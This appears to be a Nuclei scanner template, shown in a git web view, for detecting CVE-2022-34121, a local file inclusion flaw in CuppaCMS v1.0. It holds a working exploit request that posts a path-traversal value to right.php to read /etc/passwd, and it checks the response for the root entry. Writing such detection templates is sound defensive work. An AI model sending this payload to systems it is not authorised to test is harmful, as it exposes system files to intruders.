nuclei-templates/http/cves/2022/CVE-2022-34121.yaml

43 lines
1.1 KiB
YAML
Raw Normal View History

2022-09-18 06:08:37 +00:00
id: CVE-2022-34121
info:
name: CuppaCMS v1.0 - Local File Inclusion
author: edoardottt
severity: high
description: |
Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.
2022-09-18 06:08:37 +00:00
reference:
- https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
- https://github.com/CuppaCMS/CuppaCMS/issues/18
- https://nvd.nist.gov/vuln/detail/CVE-2022-34121
2022-09-18 06:08:37 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-09-18 06:08:37 +00:00
cve-id: CVE-2022-34121
cwe-id: CWE-829
cpe: cpe:2.3:a:cuppacms:cuppacms:*:*:*:*:*:*:*:*
epss-score: 0.7596
2022-09-18 13:34:43 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2022-09-18 06:08:37 +00:00
tags: cve,cve2022,lfi,cuppa,cms
http:
2022-09-18 06:08:37 +00:00
- raw:
2022-09-18 06:17:28 +00:00
- |
2022-09-18 13:36:10 +00:00
POST /templates/default/html/windows/right.php HTTP/1.1
2022-09-18 06:08:37 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=../../../../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
2022-09-18 13:34:43 +00:00
- type: regex
regex:
- "root:[x*]:0:0"
2022-09-18 06:08:37 +00:00
- type: status
status:
2022-09-18 13:34:43 +00:00
- 200